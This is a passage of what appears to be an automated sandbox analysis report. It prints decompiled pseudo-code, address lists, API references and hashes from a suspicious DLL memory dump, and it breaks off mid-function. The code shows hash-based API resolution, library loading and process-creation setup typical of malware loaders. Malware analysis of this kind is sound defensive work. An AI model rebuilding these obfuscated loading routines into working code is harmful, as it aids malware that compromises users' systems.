0x6e785e8b
0x6e785e93
0x6e785e9e
0x6e785ea6
0x6e785ea6
0x6e785bcd
0x6e785bcf
0x6e785be8
0x6e785bf1
0x6e785bf5
0x6e785bf7
0x6e785c05
0x6e785c06
0x6e785c12
0x6e785c12
0x6e785b9b
0x6e785b9b
0x6e785ba1
0x6e785ba6
0x6e785ba8
0x00000000
0x00000000
0x6e785ba8
0x6e785c1e
0x6e785c21
0x6e785c24
0x6e785d87
0x6e785d8e
0x6e785ee4
0x6e785ee4
0x6e785d94
0x6e785d9c
0x6e785daa
0x6e785dbd
0x6e785dc4
0x6e785dc9
0x6e785c2a
0x6e785c2a
0x6e785c2d
0x6e785cf0
0x6e785cf3
0x6e785cfb
0x6e785d02
0x6e785d04
0x6e785d07
0x6e785d0a
0x6e785d0d
0x6e785d1b
0x6e785d25
0x6e785d2a
0x6e785d32
0x6e785d34
0x6e785d34
0x6e785d36
0x6e785d3e
0x6e785d43
0x6e785d47
0x6e785d4f
0x6e785d58
0x6e785d58
0x6e785d5d
0x6e785d5e
0x6e785d5e
0x6e785d36
0x6e785d6e
0x6e785d73
0x6e785d7a
0x6e785d7c
0x6e785d80
0x6e785d80
0x6e785d7c
0x6e785c33
0x6e785c33
0x6e785c35
0x6e785c3b
0x6e785c42
0x6e785c58
0x6e785c5a
0x6e785c5e
0x6e785c60
0x6e785c63
0x6e785c66
0x6e785c69
0x6e785c77
0x6e785c81
0x6e785c8d
0x6e785c8f
0x6e785c96
0x6e785c9b
0x6e785ca0
0x6e785ca2
0x6e785ca2
0x6e785ca4
0x6e785ca9
0x6e785cae
0x6e785cb2
0x6e785cba
0x6e785cc3
0x6e785cc3
0x6e785cc8
0x6e785cc9
0x6e785cc9
0x6e785ca4
0x6e785ca0
0x6e785cd3
0x6e785cd8
0x6e785cdc
0x6e785cde
0x6e785ce6
0x6e785ce6
0x6e785c44
0x6e785c44
0x6e785c49
0x6e785c4f
0x6e785c52
0x00000000
0x00000000
0x6e785c52
0x6e785c42
0x6e785c35
0x6e785c2d
0x6e785dd5
0x6e785de1
0x6e785ded
0x6e785df9
0x6e785dfe
0x6e785e0a
0x6e7857bb
0x6e7857c2
0x6e7857c4
0x00000000
0x6e7857ca
0x6e7857ca
0x6e7857cc
0x00000000
0x6e7857d2
0x6e7857dc
0x6e7857e4
0x6e7857e7
0x6e7857f5
0x6e785809
0x6e78580b
0x6e78580d
0x6e785813
0x6e785813
0x6e78581a
0x6e785821
0x6e785821
0x6e785823
0x6e785828
0x6e785834
0x6e785844
0x6e785849
0x6e78584e
0x6e785854
0x6e785854
0x6e785859
0x6e78585e
0x6e785863
0x6e78586a
0x6e78586e
0x6e785873
0x6e785878
0x6e785888
0x6e78588d
0x6e785896
0x6e7858b7
0x6e7858be
0x6e7858d0
0x6e7858df
0x6e7858e4
0x6e7858e6
0x00000000
0x00000000
0x6e785996
0x6e785996
0x6e7858ec
0x6e7858ed
0x6e7858ee
0x6e7858ef
0x6e7858f0
0x6e7858f2
0x6e7858f3
0x6e7858f4
0x6e7858f5
0x6e7858f9
0x6e7858fd
0x6e7858fe
0x6e7858fe
0x6e7857cc
0x6e7857c4
0x6e785658
0x6e78565f
0x6e78566b
0x6e785677
0x6e785683
0x6e785688
0x6e785694
0x6e785694

APIs

LoadLibraryW.KERNELBASE(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 6E78562E

Strings

)V, xrefs: 6E7855D2

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: )V
API String ID: 1029625771-578813878
Opcode ID: c65f3ceaf6150e034752d95a2aad5db16c47334d4d5b81a1ca0853180487a0f0
Instruction ID: 97e02d2177f4846099a7163fadd796c5e6cb5defbfc2de78aeb3c16dbaa42f36
Opcode Fuzzy Hash: c65f3ceaf6150e034752d95a2aad5db16c47334d4d5b81a1ca0853180487a0f0
Instruction Fuzzy Hash: C531BE301182848AD775AFE4EB59BDFB3E9AFA5708F400C38D58B461B4EF305A46DB52

Uniqueness

Uniqueness Score: -1.00%

Function 6E7854F5, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
libraryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E7854F5() {
				signed int _t109;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t117;
				signed int _t118;
				signed int _t119;
				signed int _t120;
				signed int _t127;
				intOrPtr _t128;
				intOrPtr* _t132;
				void* _t147;
				void* _t157;
				intOrPtr _t160;
				signed int _t170;
				signed int _t174;
				void* _t189;
				intOrPtr* _t190;
				signed int _t193;
				unsigned int _t197;
				intOrPtr _t200;
				signed short* _t201;
				signed int _t204;
				void* _t222;
				signed int _t226;
				signed int _t229;
				signed int _t230;
				intOrPtr* _t256;
				intOrPtr* _t264;
				signed int _t279;
				signed int _t281;
				signed int _t284;
				void* _t328;
				signed int _t329;
				signed int _t332;
				void* _t334;
				signed int _t335;
				intOrPtr _t338;
				void* _t341;
				intOrPtr* _t344;

				E6E798CA0(_t344 + 0xe4);
				E6E798CA0(_t344 + 0x118);
				if(1 == 0) {
					_t226 = 0;
					__eflags = 0;
				} else {
					_t226 = 1;
				}
				E6E78AC00(_t344 + 0x120, 2);
				E6E79D980(_t344 + 0x128, _t344 + 0x130, 0x7e);
				E6E798CA0(_t344 + 0x120);
				if( *(_t344 + 0x130) > 0) {
					 *_t344 = _t338;
					_t329 = _t344 + 0x130;
					L6:
					while(1) {
						L6:
						while(1) {
							L6:
							if(E6E7915C0(0xa1310f65, 0xf3af54a7) != 0) {
								LoadLibraryW( *(E6E7A7600(_t329, _t332))); // executed
							}
							_t222 =  *(_t344 + 0x130);
							while(1) {
								_t332 = 1;
								if(1 >= _t222) {
									break;
								}
								if(1 != 4) {
									goto L6;
								} else {
									_t316 =  *0x6e7bb02a & 0x000000ff;
									if(( *0x6e7bb02a & 0x000000ff) == 2) {
										continue;
									} else {
										goto L6;
									}
								}
								goto L14;
							}
							_t338 =  *_t344;
							goto L14;
						}
					}
				}
				L14:
				__eflags =  *((intOrPtr*)(_t338 + 0x2c)) - 2;
				if( *((intOrPtr*)(_t338 + 0x2c)) != 2) {
					__eflags =  *0x6e7bb028 & 0x000000ff;
					if(( *0x6e7bb028 & 0x000000ff) == 0) {
						__eflags =  *0x6e7bb265 & 0x000000ff;
						if(( *0x6e7bb265 & 0x000000ff) == 0) {
							__eflags =  *0x6e7bb1cc - 1;
							if( *0x6e7bb1cc != 1) {
								_t200 =  *0x6e7bb1d0; // 0xee2630
								_t15 = _t200 + 4; // 0xee2658
								_t201 =  *_t15;
								_t316 =  *_t201 & 0x0000ffff;
								__eflags = ( *_t201 & 0x0000ffff) - 0x2d;
								if(( *_t201 & 0x0000ffff) != 0x2d) {
									E6E798AB0(_t344 + 0xcc, _t201, 0);
									_push(0x80);
									_push(0);
									E6E7AA4E0(_t344 + 0x68, __eflags,  *((intOrPtr*)(_t344 + 0xd0)), 1);
									_t204 = E6E7ABEA0(_t344 + 0x64, _t316, _t332);
									__eflags = _t204;
									if(_t204 == 0) {
										__eflags =  *((char*)(_t344 + 0x68));
										if( *((char*)(_t344 + 0x68)) != 0) {
											E6E7ABE30(_t344 + 0x64, _t332);
										}
										E6E798CA0(_t344 + 0x58);
										_t335 = 0;
										__eflags = 0;
										while(1) {
											__eflags = E6E7AA730(_t344 + 0xc4, _t316);
											if(__eflags == 0) {
												break;
											}
											E6E7922A0(0x64, _t316);
											_t335 = _t335 + 1;
											__eflags = _t335 - 0x64;
											if(__eflags < 0) {
												continue;
											}
											break;
										}
										_t332 = _t344 + 0xcc;
										do {
											E6E79AE80(_t344 + 0xcc, __eflags, _t332, 0x5c);
											E6E798CC0(_t344 + 0xc8,  *(_t344 + 0xcc));
											E6E798CA0(_t332);
											__eflags = E6E7AA730(_t344 + 0xc4, _t316);
										} while (__eflags == 0);
									} else {
										__eflags =  *((char*)(_t344 + 0x68));
										if( *((char*)(_t344 + 0x68)) != 0) {
											E6E7ABE30(_t344 + 0x64, _t332);
										}
										E6E798CA0(_t344 + 0x58);
									}
									E6E798CA0(_t344 + 0xc4);
								}
							}
						}
					}
					__eflags = ( *0x6e7bb02a & 0x000000ff) - 2;
					if(( *0x6e7bb02a & 0x000000ff) == 2) {
						L43:
						_t109 =  *0x6e7bb1ad; // 0xeba350
						__eflags = _t109;
						if(_t109 == 0) {
							L45:
							_t110 =  *0x6e7bb1ad; // 0xeba350
							__eflags = _t110;
							if(_t110 == 0) {
								_push(0x10);
								_t111 = E6E791030();
								_t344 = _t344 + 4;
								__eflags = _t111;
								if(_t111 != 0) {
									_push(0);
									_t112 = E6E7A9350(_t111);
								} else {
									_t112 = 0;
								}
								 *0x6e7bb1ad = _t112;
							}
							_t332 =  *0x6e7bb1ad; // 0xeba350
							__eflags = ( *0x6e7bb02a & 0x000000ff) - 1;
							if(( *0x6e7bb02a & 0x000000ff) == 1) {
								_t316 = 0x18f8c844;
								_t329 = _t344 + 0x28;
								E6E786AD0(_t226, _t329, 0x18f8c844, _t329, _t332, 1, 0);
								_push(_t329);
								E6E7A9520(_t332);
								E6E7A9510(_t329);
							} else {
								E6E7A9710(_t332, 0x6e7bb02d,  *0x6e7bb02b & 0x0000ffff);
							}
						} else {
							_t281 =  *0x6e7bb1ad; // 0xeba350
							_t174 = E6E7A9660(_t281);
							__eflags = _t174;
							if(_t174 != 0) {
								goto L45;
							}
						}
						_t117 =  *0x6e7bb1b1; // 0x0
						__eflags = _t117;
						if(_t117 == 0) {
							L51:
							_t118 =  *0x6e7bb1b1; // 0x0
							__eflags = _t118;
							if(_t118 == 0) {
								_push(0x10);
								_t119 = E6E791030();
								_t344 = _t344 + 4;
								__eflags = _t119;
								if(_t119 != 0) {
									_push(0);
									_t120 = E6E7A9350(_t119);
								} else {
									_t120 = 0;
								}
								 *0x6e7bb1b1 = _t120;
							}
							_t329 =  *0x6e7bb1b1; // 0x0
							__eflags = ( *0x6e7bb02a & 0x000000ff) - 1;
							if(( *0x6e7bb02a & 0x000000ff) == 1) {
								_t316 = 0x11041f01;
								E6E786AD0(_t226, _t344 + 0x38, 0x11041f01, _t329, _t332, 1, 1);
								_push(_t344 + 0x38);
								E6E7A9520(_t329);
								E6E7A9510(_t344 + 0x38);
								_t127 = E6E7A9650(_t329);
								__eflags = _t127;
								if(_t127 != 0) {
									_t316 = 0xd3ef7577;
									E6E786AD0(_t226, _t344 + 8, 0xd3ef7577, _t329, _t332, 0, 0);
									E6E7A9510(_t344);
								}
							} else {
								_t332 =  *0x6e7bb1c4; // 0x6e780000
								__eflags =  *((char*)(E6E793930(_t226, 0, _t329, _t332) + 0xb)) - 0x20;
								_t325 =  ==  ? 0x7e839a6 : 0x93fc68d6;
								_t316 = _t332;
								E6E789090(_t344 + 0x88, _t332,  ==  ? 0x7e839a6 : 0x93fc68d6);
								_push(_t344 + 0x88);
								E6E7A9520(_t329);
								E6E7A9510(_t344 + 0x88);
							}
						} else {
							_t279 =  *0x6e7bb1b1; // 0x0
							_t170 = E6E7A9660(_t279);
							__eflags = _t170;
							if(_t170 != 0) {
								goto L51;
							}
						}
						_t128 =  *((intOrPtr*)(_t338 + 0x2c));
						__eflags = _t128 - 3;
						if(_t128 == 3) {
							__eflags =  *0x6e7bb1cc - 3;
							if( *0x6e7bb1cc == 3) {
								E6E798CC0(_t344 + 0x10c,  *((intOrPtr*)( *0x6e7bb1d0 + 8)));
							}
							_t227 = _t344 + 0x48;
							E6E798810(_t344 + 0x48, 0);
							_t132 = E6E799890(_t227, _t344 + 0x48, _t316, _t329, _t332, _t227, 0x6e7b9428,  *((intOrPtr*)(_t338 + 0x2c)));
							E6E7A0220(_t344 + 0x110,  *_t132, 0);
							E6E798CA0(_t227);
							L6E788180(_t332);
						} else {
							__eflags = _t128 - 5;
							if(_t128 != 5) {
								__eflags = _t128 - 6;
								if(__eflags == 0) {
									_t256 = _t344 + 0xa4;
									 *_t256 = 0;
									 *((intOrPtr*)(_t256 + 4)) = 0;
									 *((intOrPtr*)(_t256 + 8)) = 0;
									 *((intOrPtr*)(_t256 + 0xc)) = 0;
									E6E795B60(_t226, _t256, _t329, _t332, __eflags);
									E6E786740(_t344 + 0xa4);
									E6E791350(0x12);
									__eflags =  *(_t344 + 0xa8);
									if( *(_t344 + 0xa8) > 0) {
										_t229 = 0;
										__eflags = 0;
										do {
											_t147 = E6E7B2B00(_t344 + 0xa8, _t229);
											__eflags =  *((char*)(_t147 + 0x3c));
											if( *((char*)(_t147 + 0x3c)) == 0) {
												L6E782A40(_t344 + 0x50, _t147);
												E6E798CA0(_t344 + 0x50);
											}
											_t229 = _t229 + 1;
											__eflags = _t229 -  *(_t344 + 0xa8);
										} while (_t229 <  *(_t344 + 0xa8));
									}
									E6E7B2970(_t226, _t344 + 0xa4, _t329);
									_t260 =  *(_t344 + 0xb0);
									__eflags =  *(_t344 + 0xb0);
									if( *(_t344 + 0xb0) != 0) {
										E6E782A20(_t260, 1);
									}
								}
							} else {
								__eflags = _t226;
								if(_t226 == 0) {
									__eflags =  *0x6e7bb1cc - 1;
									if(__eflags <= 0) {
										L60:
										_t264 = _t344 + 0x18;
										 *_t264 = 0;
										 *((intOrPtr*)(_t264 + 4)) = 0;
										 *((intOrPtr*)(_t264 + 8)) = 0;
										 *((intOrPtr*)(_t264 + 0xc)) = 0;
										E6E795B60(_t226, _t264, _t329, _t332, __eflags);
										__eflags = ( *0x6e7bb029 & 0x000000ff) - 1;
										E6E787DB0(_t344 + 0x18, 0 | ( *0x6e7bb029 & 0x000000ff) - 0x00000001 > 0x00000000);
										__eflags =  *0x6e7bb029 & 0x000000ff;
										if(( *0x6e7bb029 & 0x000000ff) != 0) {
											E6E791350(0x12);
											__eflags =  *(_t344 + 0x1c);
											if( *(_t344 + 0x1c) > 0) {
												_t230 = 0;
												__eflags = 0;
												do {
													_t157 = E6E7B2B00(_t344 + 0x1c, _t230);
													__eflags =  *((char*)(_t157 + 0x3c));
													if( *((char*)(_t157 + 0x3c)) == 0) {
														L6E782A40(_t344 + 0x10, _t157);
														E6E798CA0(_t344 + 0x10);
													}
													_t230 = _t230 + 1;
													__eflags = _t230 -  *(_t344 + 0x1c);
												} while (_t230 <  *(_t344 + 0x1c));
											}
										}
										E6E7B2970(_t226, _t344 + 0x18, _t329);
										_t267 =  *(_t344 + 0x24);
										__eflags =  *(_t344 + 0x24);
										if( *(_t344 + 0x24) != 0) {
											E6E782A20(_t267, 1);
										}
									} else {
										_t160 =  *0x6e7bb1d0; // 0xee2630
										_t58 = _t160 + 4; // 0xee2658
										__eflags = ( *( *_t58) & 0x0000ffff) - 0x2d;
										if(__eflags != 0) {
											goto L60;
										}
									}
								}
							}
						}
						E6E7A8910(_t344 + 0x130, _t329, _t332);
						E6E798CA0(_t344 + 0x110);
						E6E798CA0(_t344 + 0x108);
						E6E797A70(_t344 + 0x128);
						__eflags = 0;
						return 0;
					} else {
						__eflags =  *0x6e7bb027 & 0x000000ff;
						if(( *0x6e7bb027 & 0x000000ff) == 0) {
							goto L43;
						} else {
							__eflags = _t226;
							if(_t226 != 0) {
								goto L43;
							} else {
								__eflags =  *((char*)(_t338 + 0xb)) - 0x20;
								_t327 =  ==  ? 0x7fe7dfa2 : 0xfd81b916;
								L6E7861B0(_t226, _t344 + 0x3c,  ==  ? 0x7fe7dfa2 : 0xfd81b916, _t328, _t332, _t338);
								E6E798810(_t344 + 0x18, 0x200);
								_t284 = E6E7915C0(0xa1310f65, 0xc4d11e8a);
								__eflags = _t284;
								if(__eflags != 0) {
									_t197 =  *(_t344 + 0x18) >> 1;
									__eflags = _t197;
									_t327 =  *0x6e7bb1c4; // 0x6e780000
									 *_t284(_t327,  *(_t344 + 0x18), _t197);
								}
								_push(0x80);
								_push(0);
								E6E7AA4E0(_t344 + 0x10, __eflags,  *((intOrPtr*)(_t344 + 0x20)), 1);
								E6E7AA520(_t344 + 8, _t327, _t344 + 0x1c, 0);
								__eflags =  *((char*)(_t344 + 0x10));
								if( *((char*)(_t344 + 0x10)) != 0) {
									E6E7ABE30(_t344 + 0xc, _t332);
								}
								__eflags = 0;
								E6E798CA0(_t344);
								_t334 = _t344 + 0x1a0;
								_t341 = _t344 + 0x2c;
								while(1) {
									E6E790B70(_t334, 0, 0x44);
									 *((intOrPtr*)(_t344 + 0x1ac)) = 0x44;
									E6E790B70(_t341, 0, 0x10);
									_t344 = _t344 + 0x18;
									E6E798810(_t344 + 0x4c, 0);
									_t189 = E6E7996D0(E6E7996D0(E6E7A0220(_t344 + 0x50,  *((intOrPtr*)(_t344 + 0x40)), 0), 0x20), 0x22);
									_t190 =  *0x6e7bb1d0; // 0xee2630
									E6E7996D0(E6E7A0220(_t189,  *_t190, 0), 0x22);
									_t193 = E6E7915C0(0xa1310f65, 0x643f303c);
									__eflags = _t193;
									if(_t193 != 0) {
										break;
									}
									E6E798CA0(_t344 + 0x48);
								}
								_push(_t341);
								_push(_t334);
								_push(0);
								_push(0);
								_push(4);
								_push(0);
								_push(0);
								_push(0);
								_push( *((intOrPtr*)(_t344 + 0x68)));
								_push( *((intOrPtr*)(_t344 + 0x60)));
								asm("int3");
								return _t193;
							}
						}
					}
				} else {
					E6E7A8910(_t344 + 0x130, _t328, _t332);
					E6E798CA0(_t344 + 0x110);
					E6E798CA0(_t344 + 0x108);
					E6E797A70(_t344 + 0x128);
					__eflags = 0;
					return 0;
				}
			}

0x6e7855a8
0x6e7855b4
0x6e7855bb
0x6e7855c4
0x6e7855c4
0x6e7855bd
0x6e7855bd
0x6e7855bd
0x6e7855d2
0x6e7855e8
0x6e7855f4
0x6e785601
0x6e785603
0x6e785608
0x00000000
0x6e78560f
0x00000000
0x6e78560f
0x6e78560f
0x6e785622
0x6e78562e
0x6e78562e
0x6e785630
0x6e785637
0x6e785637
0x6e78563a
0x00000000
0x00000000
0x6e78563f
0x00000000
0x6e785641
0x6e785641
0x6e78564b
0x00000000
0x6e78564d
0x00000000
0x6e78564d
0x6e78564b
0x00000000
0x6e78563f
0x6e78564f
0x00000000
0x6e78564f
0x6e78560f
0x6e78560f
0x6e785652
0x6e785652
0x6e785656
0x6e78569c
0x6e78569e
0x6e7856ab
0x6e7856ad
0x6e7856b3
0x6e7856ba
0x6e7856c0
0x6e7856c5
0x6e7856c5
0x6e7856c8
0x6e7856cb
0x6e7856ce
0x6e7856de
0x6e7856e3
0x6e7856e8
0x6e7856f7
0x6e785700
0x6e785705
0x6e785707
0x6e785724
0x6e785729
0x6e78572f
0x6e78572f
0x6e785738
0x6e78573d
0x6e78573d
0x6e78573f
0x6e78574b
0x6e78574d
0x00000000
0x00000000
0x6e785754
0x6e785759
0x6e78575a
0x6e78575d
0x00000000
0x00000000
0x00000000
0x6e78575d
0x6e78575f
0x6e785766
0x6e785770
0x6e785783
0x6e78578a
0x6e78579b
0x6e78579b
0x6e785709
0x6e785709
0x6e78570e
0x6e785714
0x6e785714
0x6e78571d
0x6e78571d
0x6e7857a6
0x6e7857a6
0x6e7856ce
0x6e7856ba
0x6e7856ad
0x6e7857b2
0x6e7857b5
0x6e785b3c
0x6e785b3c
0x6e785b41
0x6e785b43
0x6e785b54
0x6e785b54
0x6e785b59
0x6e785b5b
0x6e785e33
0x6e785e35
0x6e785e3a
0x6e785e3d
0x6e785e3f
0x6e785e47
0x6e785e49
0x6e785e41
0x6e785e41
0x6e785e41
0x6e785e4e
0x6e785e4e
0x6e785b61
0x6e785b6e
0x6e785b71
0x6e785e0b
0x6e785e10
0x6e785e1a
0x6e785e21
0x6e785e22
0x6e785e29
0x6e785b77
0x6e785b86
0x6e785b86
0x6e785b45
0x6e785b45
0x6e785b4b
0x6e785b50
0x6e785b52
0x00000000
0x00000000
0x6e785b52
0x6e785b92
0x6e785b97
0x6e785b99
0x6e785baa
0x6e785baa
0x6e785baf
0x6e785bb1
0x6e785eb0
0x6e785eb2
0x6e785eb7
0x6e785eba
0x6e785ebc
0x6e785ec4
0x6e785ec6
0x6e785ebe
0x6e785ebe
0x6e785ebe
0x6e785ecb
0x6e785ecb
0x6e785bb7
0x6e785bc4
0x6e785bc7
0x6e785e62
0x6e785e68
0x6e785e73
0x6e785e74
0x6e785e7d
0x6e785e84
0x6e785e89
0x6e785e8b
0x6e785e93
0x6e785e9e
0x6e785ea6
0x6e785ea6
0x6e785bcd
0x6e785bcf
0x6e785be8
0x6e785bf1
0x6e785bf5
0x6e785bf7
0x6e785c05
0x6e785c06
0x6e785c12
0x6e785c12
0x6e785b9b
0x6e785b9b
0x6e785ba1
0x6e785ba6
0x6e785ba8
0x00000000
0x00000000
0x6e785ba8
0x6e785c1e
0x6e785c21
0x6e785c24
0x6e785d87
0x6e785d8e
0x6e785ee4
0x6e785ee4
0x6e785d94
0x6e785d9c
0x6e785daa
0x6e785dbd
0x6e785dc4
0x6e785dc9
0x6e785c2a
0x6e785c2a
0x6e785c2d
0x6e785cf0
0x6e785cf3
0x6e785cfb
0x6e785d02
0x6e785d04
0x6e785d07
0x6e785d0a
0x6e785d0d
0x6e785d1b
0x6e785d25
0x6e785d2a
0x6e785d32
0x6e785d34
0x6e785d34
0x6e785d36
0x6e785d3e
0x6e785d43
0x6e785d47
0x6e785d4f
0x6e785d58
0x6e785d58
0x6e785d5d
0x6e785d5e
0x6e785d5e
0x6e785d36
0x6e785d6e
0x6e785d73
0x6e785d7a
0x6e785d7c
0x6e785d80
0x6e785d80
0x6e785d7c
0x6e785c33
0x6e785c33
0x6e785c35
0x6e785c3b
0x6e785c42
0x6e785c58
0x6e785c5a
0x6e785c5e
0x6e785c60
0x6e785c63
0x6e785c66
0x6e785c69
0x6e785c77
0x6e785c81
0x6e785c8d
0x6e785c8f
0x6e785c96
0x6e785c9b
0x6e785ca0
0x6e785ca2
0x6e785ca2
0x6e785ca4
0x6e785ca9
0x6e785cae
0x6e785cb2
0x6e785cba
0x6e785cc3
0x6e785cc3
0x6e785cc8
0x6e785cc9
0x6e785cc9
0x6e785ca4
0x6e785ca0
0x6e785cd3
0x6e785cd8
0x6e785cdc
0x6e785cde
0x6e785ce6
0x6e785ce6
0x6e785c44
0x6e785c44
0x6e785c49
0x6e785c4f
0x6e785c52
0x00000000
0x00000000
0x6e785c52
0x6e785c42
0x6e785c35
0x6e785c2d
0x6e785dd5
0x6e785de1
0x6e785ded
0x6e785df9
0x6e785dfe
0x6e785e0a
0x6e7857bb
0x6e7857c2
0x6e7857c4
0x00000000
0x6e7857ca
0x6e7857ca
0x6e7857cc
0x00000000
0x6e7857d2
0x6e7857dc
0x6e7857e4
0x6e7857e7
0x6e7857f5
0x6e785809
0x6e78580b
0x6e78580d
0x6e785813
0x6e785813
0x6e78581a
0x6e785821
0x6e785821
0x6e785823
0x6e785828
0x6e785834
0x6e785844
0x6e785849
0x6e78584e
0x6e785854
0x6e785854
0x6e785859
0x6e78585e
0x6e785863
0x6e78586a
0x6e78586e
0x6e785873
0x6e785878
0x6e785888
0x6e78588d
0x6e785896
0x6e7858b7
0x6e7858be
0x6e7858d0
0x6e7858df
0x6e7858e4
0x6e7858e6
0x00000000
0x00000000
0x6e785996
0x6e785996
0x6e7858ec
0x6e7858ed
0x6e7858ee
0x6e7858ef
0x6e7858f0
0x6e7858f2
0x6e7858f3
0x6e7858f4
0x6e7858f5
0x6e7858f9
0x6e7858fd
0x6e7858fe
0x6e7858fe
0x6e7857cc
0x6e7857c4
0x6e785658
0x6e78565f
0x6e78566b
0x6e785677
0x6e785683
0x6e785688
0x6e785694
0x6e785694

APIs

LoadLibraryW.KERNELBASE(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 6E78562E

Strings

)V, xrefs: 6E7855D2

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoad
String ID: )V
API String ID: 1029625771-578813878
Opcode ID: cfd589635a68fc2abc4b730ff3c7719567dad234e9dc62d4b9c53fbb061583a2
Instruction ID: 1c1839594c264644c494cfa429c180531de5c5ef6a4f9aa43489457b6ed38c09
Opcode Fuzzy Hash: cfd589635a68fc2abc4b730ff3c7719567dad234e9dc62d4b9c53fbb061583a2
Instruction Fuzzy Hash: 3A0180311182808AD232AED5EAA4BDFB2EAAFA5704F400C39C587560B4DF309945DB42

Uniqueness

Uniqueness Score: -1.00%

Function 6E791030, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E6E791030() {
				void* _v20;
				void* _t4;
				intOrPtr* _t9;
				void* _t11;

				if( *0x6e7bb1e0 == 0xe99c89bf) {
					_t9 = E6E7915C0(0x588ab3ea, 0xc0b67de0);
					 *0x6e7bb1e4 = E6E7915C0(0x588ab3ea, 0x82d274c4);
					if( *0x6e7bb1e0 == 0xe99c89bf) {
						 *_t9(2, 0, 0, 0, 0, 0); // executed
						 *0x6e7bb1e0 = 0;
					}
				}
				_t4 = E6E7915C0(0x588ab3ea, 0x996e050f);
				if(_t4 == 0) {
					return 0;
				} else {
					_t1 = _t11 + 8; // 0x6e796c6a
					_push( *_t1);
					_push(8);
					_push( *0x6e7bb1e0);
					asm("int3");
					return _t4;
				}
			}

0x6e79103b
0x6e791073
0x6e791084
0x6e791093
0x6e79109e
0x6e7910a0
0x6e7910a0
0x6e791093
0x6e791047
0x6e79104e
0x6e791063
0x6e791050
0x6e791050
0x6e791050
0x6e791054
0x6e791056
0x6e79105c
0x6e79105d
0x6e79105d

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,588AB3EA,82D274C4,588AB3EA,C0B67DE0,?,6E798864,00000000,00000000,00000000,?), ref: 6E79109E

Strings

jlyn, xrefs: 6E791050

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID: jlyn
API String ID: 10892065-1625650399
Opcode ID: bb39ac4551ee384da196c52d702c13afe5b62e6a52c43d5d634055321f9d2baa
Instruction ID: 00279c1cccc3c10e8b876b943c274abe41ae96f4279d48af82a2beaacaa0440a
Opcode Fuzzy Hash: bb39ac4551ee384da196c52d702c13afe5b62e6a52c43d5d634055321f9d2baa
Instruction Fuzzy Hash: 04F0A738144A4DBFE7509EF57F85E6935DCEF012D4F020835E905941A4FB216134F726

Uniqueness

Uniqueness Score: -1.00%

Function 6E7B3370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E7B3370(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t102;
				signed int _t109;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t128;
				signed int _t129;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				intOrPtr _t155;
				void* _t158;
				WCHAR* _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t165;
				WCHAR* _t166;
				void* _t167;
				void* _t169;
				short _t172;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t209;
				signed int _t226;
				signed int _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int _t240;
				void* _t241;
				WCHAR* _t244;
				intOrPtr* _t249;
				void* _t253;
				short* _t254;

				_t254 = _t253 - 0x60;
				_t244 = 0;
				_t249 = __ecx;
				 *_t254 = 0;
				E6E7A06A0( &(_t254[4]), __ecx, 0);
				E6E7A06A0( &(_t254[8]), __ecx, 0);
				E6E7A06A0( &(_t254[0xc]), __ecx, 0);
				E6E7A06A0( &(_t254[0x10]), __ecx, 0);
				E6E7B4D50( &(_t254[2]),  *(_t254[0x3a]));
				_t172 =  *_t254;
				E6E798810( &(_t254[0x1e]), 0);
				E6E7987A0( &(_t254[0x20]));
				E6E7987A0( &(_t254[0x24]));
				_t102 = E6E7A0220( &(_t254[0x20]), _t254[0x26], 0);
				E6E7987A0( &(_t254[0x28]));
				E6E7A0220(_t102, _t254[0x2a], 0);
				E6E798CA0( &(_t254[0x28]));
				E6E798CA0( &(_t254[0x24]));
				if(E6E7A1000( &(_t254[2])) == 0) {
					_t242 = _t254[2];
					_t169 = E6E7AD620(_t242, E6E7A6040(_t254[2], 0x7fffffff));
					if(_t169 != 0x97780db2) {
						__eflags = _t169 - 0x3ef665a6;
						if(_t169 == 0x3ef665a6) {
							 *(_t249 + 0x18) = 1;
						}
					} else {
						 *(_t249 + 0x18) = 0;
					}
				}
				if(E6E7915C0(0xd27f045a, 0xe214cde) == 0) {
					__eflags =  *((char*)(_t249 + 0xc));
